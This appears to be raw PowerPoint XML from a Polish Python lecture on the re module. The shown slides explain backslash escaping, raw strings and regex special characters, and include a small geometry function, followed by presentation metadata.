              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math.pow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(b,2))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>round</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(c,2)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>c,x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>	y = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math.sqrt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math.pow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(c,2)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>math.pow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(x,2))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>round</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>(y,2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408023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F9CEA3-985B-40D9-27B1-33592FC3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05A3D0-E704-CA45-1A1D-14ECE084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195526"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>\ oznacza specjalne użycie tego co jest bezpośrednio po \ albo odwrotnie: użycie specjalnego znaku (tego po \) jako zwykłego</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Jest tak zarówno w wyrażeniach regularnych, jak i w samym przechowywaniu znaków w stringach (np. \n jako znak nowej linii), dlatego zwykły \ w stringu zapisujemy jako \\, a zwykły \ w wyrażeniu regularnym jako \\\\ (dwa zwykłe \)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Specjalne "surowe" stringi (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> string) traktują \ jako \, np. r"\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Wyrażenia regularne w module re, więcej funkcjonalności w module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>regex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986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70BFA0-01E2-230B-6C89-CEFC728C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C6A54D-2AB6-EFD4-9BE7-DCE378667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460162" cy="3979625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Umowa NA POTRZEBY WYKŁADU: "stringi", 'wyrażenia'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Wyrażenie regularne sprawdza czy dany string pasuje do wzorca</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>Najprostsze wyrażenia regularne: czy w stringu występuje to co jest w wyrażeniu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t> 'a' szuka czy jest litera "a", a 'abc' czy jest ciąg "abc" (ale już nie "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>cab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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2278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8686CC-EBD0-697A-5890-1C136041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Znaki specjalne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3C9F7A-FF59-A96E-597D-45D6B8D7A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382851"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'.' kropka – oznacza jakikolwiek znak oprócz nowej linii (chyba że DOTALL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'^' daszek – początek stringa (albo tuż po nowej linii w trybie MULTILINE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'$' dolar – koniec stringa (albo koniec linii w trybie MULTILINE)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>jeśli string kończy się na "\n", $ pasuje i do końca stringa, i do końca linii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" dirty="0"/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452BFCD0-7C30-290F-22D3-9DC278DA1671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4286250" y="4276725"/>
            <a:ext cx="0" cy="323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2CDE0840-0149-7EE9-19D2-E6AB158AB7A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4591050" y="4276725"/>
            <a:ext cx="0" cy="323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65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1ECA16-5142-3BB4-CB67-1ED8C2E3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Znaki specjalne - modyfikatory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E2C1D3-791D-1F8B-B794-1093BEB78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3199"/>
            <a:ext cx="11641138" cy="3979625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'*' gwiazdka – oznacza zero lub więcej powtórzeń wyrażenia które jest bezpośrednio przed gwiazdką, np. 'ab*' pasuje do "a" (zero b), "ab", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>abbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>"…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'+' plus – to samo co gwiazdka, tyle że jedno lub więcej ('ab+' nie pasuje do "a")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'?' pytajnik – to samo co gwiazdka, tyle że jedno lub zero ('ab?' tylko do "a", "ab")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0"/>
              <a:t>'*?', '+?', '??' drugi pytajnik po jednym z tych trzech znaków – oznacza tryb niezachłanny, do wzorca dopasowywany jest jak najwcześniejszy i jak najkrótszy fragment, np. '&lt;.*&gt;' dla stringa "&lt;a&gt; b &lt;c&gt;" zwróci cały string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pl-PL" dirty="0"/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198FA0C4-A131-E684-A200-5461B8FAF7C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5248275" y="5768974"/>
            <a:ext cx="0" cy="323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2D408DCD-731B-2179-FA85-1AAA4D144AE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6400800" y="5768974"/>
            <a:ext cx="0" cy="323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6135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4421</TotalTime>
  <Words>2940</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panoramiczny</PresentationFormat>
  <Paragraphs>135</Paragraphs>
  <Slides>35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39" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Sitka Heading</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>3DFloatVTI</vt:lpstr>
      <vt:lpstr>Programowanie w Pythonie Biblioteka re + bonus</vt:lpstr>
      <vt:lpstr>Uwagi do wycieku pamięci</vt:lpstr>
      <vt:lpstr>Przykłady prawdziwie złośliwego kodu </vt:lpstr>
      <vt:lpstr>Przykłady prawdziwie złośliwego kodu </vt:lpstr>
      <vt:lpstr>Ukrywanie złośliwego kodu </vt:lpstr>
      <vt:lpstr>Wyrażenia regularne</vt:lpstr>
      <vt:lpstr>Wyrażenia regularne</vt:lpstr>
      <vt:lpstr>Znaki specjalne</vt:lpstr>
      <vt:lpstr>Znaki specjalne - modyfikatory</vt:lpstr>
      <vt:lpstr>Znaki specjalne - modyfikatory</vt:lpstr>
      <vt:lpstr>Znaki specjalne - modyfikatory</vt:lpstr>
      <vt:lpstr>Znaki specjalne – liczba powtórzeń</vt:lpstr>
      <vt:lpstr>Znaki specjalne – zestawy znaków</vt:lpstr>
      <vt:lpstr>Znaki specjalne – zestawy znaków</vt:lpstr>
      <vt:lpstr>Znaki specjalne – łączenie wyrażeń</vt:lpstr>
      <vt:lpstr>Znaki specjalne – łączenie wyrażeń</vt:lpstr>
      <vt:lpstr>Znaki specjalne – inne</vt:lpstr>
      <vt:lpstr>Znaki specjalne – inne</vt:lpstr>
      <vt:lpstr>Flagi biblioteki re (domyślnie wyłączone)</vt:lpstr>
      <vt:lpstr>Flagi biblioteki re (domyślnie wyłączone)</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Funkcje biblioteki re</vt:lpstr>
      <vt:lpstr>Metody obiektów-wyrażeń</vt:lpstr>
      <vt:lpstr>Atrybuty obiektów-wyrażeń</vt:lpstr>
      <vt:lpstr>Metody obiektów-dopasowań</vt:lpstr>
      <vt:lpstr>Metody obiektów-dopasowań</vt:lpstr>
      <vt:lpstr>Metody obiektów-dopasowań</vt:lpstr>
      <vt:lpstr>Atrybuty obiektów-dopasowań</vt:lpstr>
      <vt:lpstr>Przykłady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Pythonie</dc:title>
  <dc:creator>Łukasz Mioduszewski</dc:creator>
  <cp:lastModifiedBy>Łukasz Mioduszewski</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-26T23:14:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-23T01:18:34Z</dcterms:modified>
</cp:coreProperties>
</file>